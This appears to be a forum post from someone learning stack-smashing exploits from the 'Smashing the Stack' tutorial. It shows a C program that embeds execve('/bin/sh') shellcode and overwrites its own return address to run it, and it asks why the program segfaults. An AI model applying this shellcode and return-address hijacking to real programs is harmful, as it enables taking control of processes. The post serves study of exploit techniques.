Segmentation Fault when trying to inject shellcode
Hi all I've been trying to learn more about stack exploits and had been following
https://insecure.org/stf/smashstack.html.
I am trying to implement the section
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

void main() {
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;

}

Through gdb I am able to verify that the info frame 0 is showing the shellcode address as the return address. However, every time I ran it I would get a Segmentation Fault. Is anyone able to help in identifying the cause of the segmentation fault?
